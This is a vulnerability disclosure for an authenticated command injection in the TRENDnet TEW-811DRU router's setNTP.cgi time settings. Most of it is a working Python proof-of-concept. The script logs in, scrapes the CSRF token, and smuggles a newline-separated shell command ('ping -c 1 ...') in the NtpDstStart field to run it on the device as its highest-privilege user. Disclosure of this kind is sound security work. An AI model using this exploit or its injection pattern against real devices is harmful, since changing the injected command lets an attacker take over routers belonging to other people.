| Description | # Command injection in TRENDnet router
## Overview of the Vulnerability
A command injection vulnerability exists in TRENDnet router TEW-811DRU(latest firmware version:1.0.10.0. For Device information please refer to https://www.trendnet.com/support/support-detail.asp?prod=100_TEW-811DRU.
The vulnerability allows a malicious attacker authenticated on the web to execute commands in the device remotely by crafting a request, enabling an attacker to gain the highest privilege of the system and take over the device.
The device uses HTTP basic authentication which leaks passwords easily from the HTTP flow, so this vulnerability can be exploited easily.
## Steps to Reproduce
I have put the PoC code in the next section, configure several parameters and execute it, you will see an outputing ping echo from the target device. The parameters are as below:
1. username and password: used to visit the device's web interface(Located on the device nameplate).
2. device_web_ip: web IP address of the target device.
3. ping_target: Usually configured as the local host. The device will send a ping echo to this host.
You can open Wireshark to monitor the ICMP flow. After executing the PoC, you will see a ping echo from the device to the local host.
## Proof of Concept
Save the python3 code below as POC and execute it.
```
import requests,socket
import re
import time
from urllib.parse import urlencode
username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'
request = {'HEAD':
{'Host': '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '555',
'Origin': 'http://x.x.x.x:8081',
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=',
'Connection': 'keep-alive',
'Referer': 'http://x.x.x.x:8081/adm/time.asp',
'Cookie': 'expandable=5c',
'Upgrade-Insecure-Requests': '1'},
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY',
'DSTenable': 'on',
'NtpDstEnable': 1,
'NtpDstOffset': -7200,
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip),
'tz_daylight_start_day_select': 1,
'tz_daylight_start_time_select': 2,
'NtpDstEnd': 100102,
'tz_daylight_end_month_select': 384968387,
'tz_daylight_end_day_select': 1,
'tz_daylight_end_time_select': 2,
'enableNTP': 1,
'ntp_server': 1,
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11',
'timer_interval': 16776915,
'manual_year_select': 2012,
'manual_month_select': 'abcd',
'manual_day_select': 'abcd',
'manual_min_select': -38,
'manual_sec_select': "abcd",
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../',
'DNSServerGuest': ''},
'ATTR':
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip),
'METHOD': 'POST',
'VERSION': 'HTTP/1.1'}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
login_header = {'Host': 'x.x.x.x:8081',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referer': 'http://x.x.x.x:8081/login.asp',
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
try:
loop -= 1
r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
if r.status_code != 200:
continue
r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
pat = r'name="token" value="(.*?)"'
token_value = re.findall(pat,r.text)
if len(token_value)>0:
params['token'] = token_value[0]
print('new_token:{}'.format(token_value[0]))
break
except Exception as e:
time.sleep((3-loop)*3)
print('error:{}'.format(e))
try:
r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
pass
```
|
|---|